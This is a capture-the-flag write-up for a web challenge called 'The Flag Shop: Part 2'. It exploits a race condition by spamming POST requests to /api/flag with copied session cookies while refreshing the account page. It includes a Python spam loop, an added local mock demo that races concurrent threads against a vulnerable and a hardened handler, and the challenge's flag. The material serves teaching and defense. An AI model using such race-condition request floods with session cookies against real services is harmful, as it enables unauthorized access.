The Flag Shop: Part 2 - 100 (Web Exploitation)
Write-up by Oksisane
Problem
A bit harder. http://flagshop2.problem.sctf.io
Hint
Time is precious. Never waste it.
Answer
Overview
Spam requests to /api/flag and refresh the account page.
Details
Looking at the source of flagshop2, the only change from part 1 is this new client-side code (jQuery):
$.post("/api/flag", function() {
    display_message("#unlock_msg", "success", "done.");
});
Looks like the /api/flag/unlock and /api/flag/delete calls are done server side now: the browser only POSTs to /api/flag, and the server unlocks the flag and deletes it again in the same request. We need a way to beat the server to the flag! Between the unlock and the delete there is a short window in which the account page shows the flag, which is what the hint ("Time is precious") points at. The way I did it is by spamming requests to /api/flag using Python. Here's the source:
import requests, time

flagurl = "http://flagshop2.problem.sctf.io/api/flag/"
payload = ""
# The session cookies copied from the logged-in browser session, so the
# server attributes each unlock to our account.
headers = {
    'cookie': "sid=s%3Arygx5swsocb5g3gylg3qhh7gk.exfuOQEV4ou6S%2Fb2QppzLiYukQWHqfFGHwVtuS7wDdM; email=s%3Aehsan%40blah.com.s2ROHWeVypYBnyikyx7aWY4ShzelKWs65JUMvzGsBzk"
}

def requestFlag():
    # One POST to /api/flag: the server unlocks the flag, then deletes it.
    response = requests.post(flagurl, data=payload, headers=headers)
    print(response.text)

while True:
    requestFlag()
    # sleep .1 to be nice :)
    time.sleep(.1)
The cookie header is used so the site still knows who we are logged in as; without it the unlock would not land on our account. Running the script and refreshing the account page a few times gives the flag.
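To show the race end to end, here is an added example of my own; it is not the author's script and not the challenge's code. It runs a constructed local mock of the shop: a /api/flag handler that writes the flag into the account record, does a little work, then deletes it again, and an /account page that renders whatever the record holds. The /account path, the length of the window, the cookie and the flag value are all assumptions. The attacker side runs the write-up's two halves concurrently, several threads spamming POST /api/flag while others refresh /account, and returns the first flag a refresh sees. A second run against a hardened handler that never writes the flag into state another request can read shows that the race disappears.

```python
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-ins: the real flag and session live only on the CTF server.
FLAG = "flag{constructed_example_value}"
COOKIE = "sid=constructed; email=constructed"


class Account:
    """Constructed model of the per-user record the account page renders from."""

    def __init__(self):
        self.flag = None


def make_handler(account, vulnerable, window):
    class Handler(BaseHTTPRequestHandler):
        def log_message(self, fmt, *args):  # keep the demo quiet
            pass

        def _reply(self, status, body):
            self.send_response(status)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_POST(self):
            if self.path != "/api/flag":
                return self._reply(404, b"not found")
            if vulnerable:
                # Modelled server-side unlock ... delete: for `window` seconds the
                # flag sits in account state that any other request can render.
                account.flag = FLAG
                time.sleep(window)
                account.flag = None
            # Hardened variant: never writes the flag into shared state at all.
            self._reply(200, b"done.")

        def do_GET(self):
            if self.path != "/account":
                return self._reply(404, b"not found")
            self._reply(200, (account.flag or "no flag yet").encode())

    return Handler


def race(vulnerable, seconds, window=0.02, spammers=3, pollers=3):
    """Run spam-and-refresh against a local mock; return the first flag seen, or None."""
    account = Account()
    server = ThreadingHTTPServer(("127.0.0.1", 0), make_handler(account, vulnerable, window))
    base = "http://127.0.0.1:%d" % server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()

    stop = threading.Event()
    found = []

    def fetch(path, method):
        data = b"" if method == "POST" else None
        req = urllib.request.Request(base + path, data=data, method=method,
                                     headers={"Cookie": COOKIE})
        try:
            with urllib.request.urlopen(req, timeout=2) as resp:
                return resp.read().decode()
        except (urllib.error.URLError, OSError):
            return ""

    def spam():  # the write-up's loop: hammer /api/flag until told to stop
        while not stop.is_set():
            fetch("/api/flag", "POST")

    def poll():  # the "refresh the account page" half of the attack
        while not stop.is_set():
            body = fetch("/account", "GET")
            if body.startswith("flag{"):
                found.append(body)
                stop.set()

    threads = [threading.Thread(target=spam, daemon=True) for _ in range(spammers)]
    threads += [threading.Thread(target=poll, daemon=True) for _ in range(pollers)]
    for t in threads:
        t.start()
    stop.wait(seconds)  # returns early as soon as a poller catches the flag
    stop.set()
    for t in threads:
        t.join(timeout=3)
    server.shutdown()
    server.server_close()
    return found[0] if found else None


if __name__ == "__main__":
    print("vulnerable mock leaked:", race(vulnerable=True, seconds=5.0))
    print("hardened mock leaked:  ", race(vulnerable=False, seconds=1.0))
```

Only the standard library is used, so it runs offline. The window of 20 ms is generous on purpose; against a real server the window is whatever work sits between the unlock and the delete, which is why the attack works better with several concurrent writers and readers than with one sequential loop.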
Flag
flag{4f8703d93bdb7b46615e498d}